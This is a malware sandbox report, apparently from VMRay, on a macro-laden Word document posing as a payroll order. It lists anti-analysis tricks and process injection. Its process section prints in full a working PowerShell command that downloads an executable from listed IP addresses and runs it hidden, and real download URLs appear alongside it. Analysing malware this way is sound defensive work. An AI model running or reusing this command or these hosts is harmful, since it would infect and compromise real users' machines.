a14e514d...0b34 | VTI
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Dropper, Downloader

a14e514ddfc3a921c5a9e2fc9b931bc734b4927fa9d4b011ab77f9e46da50b34 (SHA256)

Order_Payroll_81154032.doc

Word Document

Created at 2019-02-06 16:40:00

Notifications (1/1)

The overall sleep time of all monitored processes was truncated from "20 seconds" to "10 seconds" to reveal dormant functionality.

Severity | Category | Operation | Classification
5/5 | Anti Analysis | Tries to detect virtual machine | -
  • Possibly trying to detect VM via rdtsc.
5/5 | Anti Analysis | Makes direct system call to possibly evade hooking based sandboxes | -
  • Makes a direct system call to "NtUnmapViewOfSection".
  • Makes a direct system call to "NtCreateSection".
  • Makes a direct system call to "NtMapViewOfSection".
  • Makes a direct system call to "NtWriteVirtualMemory".
  • Makes a direct system call to "NtResumeThread".
5/5 | Injection | Writes into the memory of another running process | -
  • "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe" modifies memory of "c:\windows\system32\svchost.exe"
5/5 | Injection | Writes into the memory of a process running from a created or modified executable | -
  • "c:\users\aetadzjz\appdata\local\temp\fulezad.exe" modifies memory of "c:\users\aetadzjz\appdata\local\temp\fulezad.exe"
  • "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe" modifies memory of "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe"
5/5 | Injection | Modifies control flow of a process running from a created or modified executable | -
  • "c:\users\aetadzjz\appdata\local\temp\fulezad.exe" alters context of "c:\users\aetadzjz\appdata\local\temp\fulezad.exe"
  • "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe" alters context of "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe"
4/5 | Process | Creates process | -
  • Creates process "powershell.exe "<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,($env:temp+'\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$mmb1=@('64.44.51.87/electra.crm','89.46.223.114/electra.crm');foreach ($bifa in $mmb1){if(split-strings('https://'+$bifa) -eq 1){break;} };<#validate component#>start-process ($env:temp+'\fulezad.exe') -windowstyle hidden;"".
  • Creates process "C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe".
  • Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
  • Creates process "C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe".
4/5 | Process | Reads from memory of another process | -
  • "c:\users\aetadzjz\appdata\local\temp\fulezad.exe" reads from "C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe".
  • "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe" reads from "C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe".
  • "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe" reads from "C:\Windows\system32\svchost.exe".
4/5 | OS | Disables a crucial system service | -
4/5 | Network | Downloads data | Downloader
  • URL "HTTPS://185.222.202.79/sat36/YKYD69Q_W617601.2E664EE04488A02C628E0E6CA864C24A/5/spk/".
3/5 | Network | Connects to remote host | -
3/5 | PE | Executes dropped PE file | -
3/5 | YARA | YARA match | -
  • Rule "VBA_Execution_Commands" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\Order_Payroll_81154032.doc"
  • Rule "VBA_Time_Delay_with_HighVal" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\Order_Payroll_81154032.doc"
2/5 | Network | Connects to HTTP server | -
  • URL "185.222.202.79/sat36/YKYD69Q_W617601.2E664EE04488A02C628E0E6CA864C24A/5/spk/".
2/5 | PE | Drops PE file | Dropper
2/5 | VBA Macro | Executes macro on specific worksheet event | -
  • Executes macro automatically on target "auto" and event "open".
2/5 | VBA Macro | Creates suspicious COM object | -
1/5 | Process | Creates system object | -
1/5 | Static | Unparsable sections in file | -
  • Static analyzer was unable to completely parse the analyzed file: C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe.
1/5 | VBA Macro | Contains Office macro | -
Function Logfile

This feature requires an online connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.